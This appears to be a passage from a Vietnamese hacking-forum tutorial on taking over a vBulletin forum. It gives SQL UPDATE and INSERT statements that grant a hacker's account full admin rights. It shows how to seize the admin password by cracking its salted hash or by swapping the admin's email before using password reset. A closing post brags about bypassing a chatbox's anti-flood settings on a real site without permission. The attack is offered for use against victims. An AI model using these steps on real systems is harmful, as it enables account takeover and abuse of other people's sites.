Update administrator set userid=’userid của nick hacker’ where userid=’userid của admin’ Code:
Update administrator set userid=’5’ where userid=’1’ 2.b) Dùng lệnh INSERT
ở đây ta có info của table administrator như sau
Code:
userid : 1 adminpermissions : 491516
navprefs : NULL
cssprefs :vBulletin_3_CarbonFibre2'
notes : NULL
dismissednews: NULL
languageid : 0
Code:
INSERT INTO `4rum`.`administrator` (`userid`, `adminpermissions`, `navprefs`, `cssprefs`, `notes`, `dismissednews`, `languageid`) VALUES ('5', '491516', NULL, ' vBulletin_3_CarbonFibre2', NULL, NULL, '0'); INSERT INTO `4rum`.`administrator` <== INSERT vào table administrator của database tên là 4rum.
Code:
(`userid` ,
`adminpermissions` ,
`navprefs` ,
`cssprefs` ,
`notes` ,
`dismissednews` ,
`languageid`
)
VALUES (
'5', '2345', NULL , ' vBulletin_3_CarbonFibre2', NULL , NULL , '0' );
Với câu lệnh này ta đã insert userid của nick hacker vào admin (có toàn quyền admin)
(Nếu bạn nào ko hiểu thì có thể tim hiểu thêm trên google)
Xong thử vào admincp của 4rum đăng nhập bằng nick hacker xem thế nào
Cách 3: Forget pass admin
Cách này thì đơn gian hơn 2 cách trên
Cách thức như sau
Vào 4rum victim đặng nhập bằng nick của admin …. Pass thì đánh đại đi
Khi đăng nhâp sai VBB sẽ thông báo và xuất hiện phần nhập mail và lấy lại password
http://victim/4rum/login.php?do=lostpw
nhập email của thằng admin vào rồi nhấp ok
sau đó vào data copy password mã hóa + sail
bỏ vào tool passwordpro
cho crack ở chế độ là số và ngồi đợi …
nếu bạn nào ko muốn đợi thì làm cách này
vào data
update mail của thẳng admin thành mail của mình
khi forget thì nhập mail của mình vào….
Sau khi forget xong vào mail lấy pass
Tut the end
Flood ChangUonDyU Chatbox (Bypass Anti Flood)
Flood này thì nhiều bạn biết rồi, nhưng đó là với server config chatbox:
$config['check_domain_reffer'] = false; // Kiem tra site gui yeu cau
Còn với server config:$config['check_chatbox_key'] = false; // Kiem tra tu khoa chat box
$config['check_domain_reffer'] = true; // Kiem tra site gui yeu cau
$config['check_chatbox_key'] = true; // Kiem tra tu khoa chat boxThì hãy xem clip bên trên và suy nghĩ xem Juno_okyo đã bypass Anti Flood của ChangUonDyU như nào nhé! :D
P/S: chân thành xin lỗi BeYeuGroup vì đã test chatbox mà ko báo trước :D.
* Trong clip trên còn 1 điều, đó là Juno ko hề login BYG, và nick flood kia là fake và suýt bị mod ban =)) Xem chi tiết »
